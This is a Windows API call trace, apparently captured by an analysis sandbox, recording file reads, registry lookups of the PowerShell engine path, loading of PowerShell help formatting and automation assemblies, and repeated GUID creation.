	[0806.468] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.470] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.470] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.470] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.471] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.471] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.471] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.472] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.472] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.475] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.476] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.476] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.148] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.149] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.149] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.149] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.150] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.150] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.151] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.151] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.151] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.152] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.152] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.152] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.153] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.159] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.159] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.160] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.160] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.161] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.161] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.161] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.162] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.162] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.163] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.163] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.163] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.164] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.164] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.164] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.165] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.165] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.165] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.166] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.166] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.166] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.167] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.167] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.167] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.168] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.168] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.168] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.169] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.169] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.169] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0807.170] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0xf37, lpOverlapped=0x0) returned 1
	[0807.170] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d2f67, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d2f67*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0807.170] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0807.170] CloseHandle (hObject=0x2ec) returned 1
	[0807.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0807.171] SetErrorMode (uMode=0x1) returned 0x1
	[0807.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0807.171] SetErrorMode (uMode=0x1) returned 0x1
	[0807.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0807.171] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2ec) returned 0x0
	[0807.171] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0807.172] CoTaskMemAlloc (cb=0x5a) returned 0x2b6db0
	[0807.172] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2b6db0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0807.172] CoTaskMemFree (pv=0x2b6db0) 
	[0807.172] RegCloseKey (hKey=0x2ec) returned 0x0
	[0807.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0807.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0807.930] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd98524f1, Data2=0xa8d3, Data3=0x4a2b, Data4=([0]=0xb9, [1]=0x8a, [2]=0x36, [3]=0x65, [4]=0xdb, [5]=0x28, [6]=0xb4, [7]=0x9c))) returned 0x0
	[0807.930] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x68ef905b, Data2=0xcbcf, Data3=0x433d, Data4=([0]=0xbe, [1]=0x3f, [2]=0x8d, [3]=0x81, [4]=0x23, [5]=0x36, [6]=0xd3, [7]=0x4))) returned 0x0
	[0807.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.955] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x791a04a2, Data2=0xe3ad, Data3=0x4fc4, Data4=([0]=0x82, [1]=0x50, [2]=0xfb, [3]=0xc9, [4]=0x85, [5]=0x60, [6]=0x79, [7]=0xe6))) returned 0x0
	[0807.956] VirtualQuery (in: lpAddress=0x16b6e0, lpBuffer=0x16c5a0, dwLength=0x30 | out: lpBuffer=0x16c5a0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.957] VirtualQuery (in: lpAddress=0x16b770, lpBuffer=0x16c630, dwLength=0x30 | out: lpBuffer=0x16c630*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.959] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x8236aafb, Data2=0x531f, Data3=0x4e5e, Data4=([0]=0xb5, [1]=0x6a, [2]=0xc4, [3]=0x78, [4]=0x7c, [5]=0xa8, [6]=0x32, [7]=0x85))) returned 0x0
	[0808.586] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x933e9019, Data2=0x6b46, Data3=0x422c, Data4=([0]=0xbb, [1]=0x71, [2]=0x68, [3]=0x95, [4]=0x4d, [5]=0x57, [6]=0xfd, [7]=0xae))) returned 0x0
	[0808.587] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbd6312f2, Data2=0x4b16, Data3=0x4e8a, Data4=([0]=0x8e, [1]=0x7, [2]=0xa8, [3]=0x8a, [4]=0x13, [5]=0x35, [6]=0x69, [7]=0xbd))) returned 0x0
	[0808.606] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xeddfac5, Data2=0x46f4, Data3=0x4032, Data4=([0]=0xb2, [1]=0x7a, [2]=0x20, [3]=0x1d, [4]=0x62, [5]=0x7a, [6]=0xb4, [7]=0x29))) returned 0x0
	[0808.607] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x86a5676e, Data2=0x192f, Data3=0x4209, Data4=([0]=0xb5, [1]=0x88, [2]=0xe0, [3]=0xac, [4]=0x13, [5]=0x8d, [6]=0xff, [7]=0x43))) returned 0x0
	[0808.607] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2c7e717a, Data2=0x281a, Data3=0x4570, Data4=([0]=0xb5, [1]=0xaf, [2]=0x58, [3]=0x27, [4]=0xfb, [5]=0x4b, [6]=0x2d, [7]=0x6c))) returned 0x0
	[0808.608] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x92bf08a3, Data2=0x9790, Data3=0x46e0, Data4=([0]=0x86, [1]=0x5d, [2]=0x7e, [3]=0xa8, [4]=0x53, [5]=0x90, [6]=0xa, [7]=0x90))) returned 0x0
	[0808.608] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb4318e0f, Data2=0x6a38, Data3=0x42ac, Data4=([0]=0xba, [1]=0x91, [2]=0x2b, [3]=0x46, [4]=0xa5, [5]=0xac, [6]=0x8, [7]=0x42))) returned 0x0
	[0808.608] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x70288aaf, Data2=0x4238, Data3=0x4e48, Data4=([0]=0xa7, [1]=0x8f, [2]=0xeb, [3]=0xc7, [4]=0xd, [5]=0x7, [6]=0xc, [7]=0x4c))) returned 0x0
	[0808.608] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2cee84fd, Data2=0x468d, Data3=0x4397, Data4=([0]=0x9a, [1]=0x10, [2]=0xeb, [3]=0x81, [4]=0x1a, [5]=0x0, [6]=0x2d, [7]=0x78))) returned 0x0
	[0808.609] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6087f124, Data2=0x9d03, Data3=0x4528, Data4=([0]=0xa0, [1]=0xad, [2]=0x73, [3]=0x69, [4]=0x4e, [5]=0x45, [6]=0x77, [7]=0x8f))) returned 0x0
	[0808.609] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xed4a9ad3, Data2=0x75ce, Data3=0x433c, Data4=([0]=0xae, [1]=0x56, [2]=0xcc, [3]=0xe2, [4]=0xec, [5]=0xd0, [6]=0x29, [7]=0x7d))) returned 0x0
	[0808.616] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3d7b0a33, Data2=0x46c1, Data3=0x4eb4, Data4=([0]=0x91, [1]=0xbd, [2]=0x8f, [3]=0xca, [4]=0x35, [5]=0x3, [6]=0xc, [7]=0x13))) returned 0x0
	[0809.511] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa54ebf2b, Data2=0x226, Data3=0x4739, Data4=([0]=0x95, [1]=0x17, [2]=0xd2, [3]=0xca, [4]=0xdc, [5]=0x49, [6]=0x7, [7]=0x1a))) returned 0x0
	[0809.518] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc155eeb6, Data2=0x4b2f, Data3=0x4195, Data4=([0]=0xaa, [1]=0xa4, [2]=0xba, [3]=0x1e, [4]=0x98, [5]=0xd6, [6]=0xa4, [7]=0x58))) returned 0x0
	[0809.519] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5efee7d2, Data2=0x2127, Data3=0x4994, Data4=([0]=0x98, [1]=0x61, [2]=0x5f, [3]=0xdb, [4]=0xc5, [5]=0xdf, [6]=0xbf, [7]=0xe0))) returned 0x0
	[0809.519] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x645fc32b, Data2=0xf650, Data3=0x4203, Data4=([0]=0xb2, [1]=0x33, [2]=0x56, [3]=0xb3, [4]=0xe, [5]=0xf3, [6]=0xd8, [7]=0x37))) returned 0x0
	[0809.520] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbc067bc9, Data2=0x2dc5, Data3=0x4de2, Data4=([0]=0xb9, [1]=0xea, [2]=0x66, [3]=0x45, [4]=0x8e, [5]=0x50, [6]=0xb3, [7]=0x7d))) returned 0x0
